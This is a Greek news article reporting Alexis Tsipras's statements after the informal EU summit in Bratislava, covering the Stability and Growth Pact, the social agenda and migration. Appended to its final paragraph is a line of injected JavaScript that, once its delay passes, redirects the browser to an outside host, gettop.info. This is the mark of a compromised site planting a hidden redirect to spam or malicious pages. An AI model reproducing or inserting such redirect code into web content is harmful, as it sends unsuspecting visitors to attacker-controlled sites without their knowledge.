«Αισιόδοξα συγκρατημένος» αποχώρησε από την Μπρατισλάβα ο Τσίπρας (ΒΙΝΤΕΟ)

0
9

 

Το Σύμφωνο Σταθερότητας και Ανάπτυξης πρέπει να γίνει και ανάπτυξης, όχι μόνο δημοσιονομικής πειθαρχίας, τόνισε ο πρωθυπουργός Αλέξης Τσίπρας, σε δηλώσεις του μετά την άτυπη σύνοδο κορυφής της Ε.Ε., δηλώνοντας ότι αποχωρεί από την Μπρατισλάβα συγκρατημένα αισιόδοξος ότι κάτι μπορεί να αλλάξει.

Σήμερα έγινε αντιληπτό ότι οι περισσότεροι από τους 27 ηγέτες της Ε.Ε., έχουν κατανοήσει ότι βρισκόμαστε σε μια μεγάλη κρίση, η οποία θα γίνει υπαρξιακή κρίση, πως αν δεν αλλάξουμε θα οδηγηθούμε σε μεγάλα αδιέξοδα, σημείωσε.
Όπως ανέφερε, οι πολίτες δεν εμπνέονται από την Ε.Ε., η οποία, όπως υπογράμμισε, πρέπει να αποκτήσει νέο όραμα για να ξαναεμπνεύσει τους πολίτες.

Πρόσθεσε ότι παραμένουν οι διαφορετικές εκτιμήσεις για τα συγκεκριμένα μέτρα που πρέπει να ληφθούν, ωστόσο, μπαίνει στο τραπέζι η κοινωνική ατζέντα.

Ενδεικτικά ανέφερε πως στα κοινά συμπεράσματα οι ηγέτες καλωσορίζουν την παρέμβαση Γιούνκερ στην Ευρωβουλή, η οποία, όπως σημείωσε, βάζει συγκεκριμένους κοινωνικούς στόχους σε προτεραιότητα.

«Γίνεται ένα βήμα, έστω και μικρό, ανολοκλήρωτο, και πρέπει να συνεχίσουμε σε αυτή την κατεύθυνση» συνέχισε.
Αναφερόμενος στο μεταναστευτικό, υπογράμμισε την ανάγκη να αντιμετωπίσουμε την κρίση αυτή όχι με τη λογική του «ό,τι δεν είναι στη δική μου αυλή δεν με αφορά».

Καταλήγοντας επισήμανε πως στη σύνοδο «άνοιξαν κρίσιμα ζητηματα, κάπως αλλάζουν οι ισορροπίες, μπαίνουν στο προσκήνιο στόχοι που είχαν ξεχαστεί». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here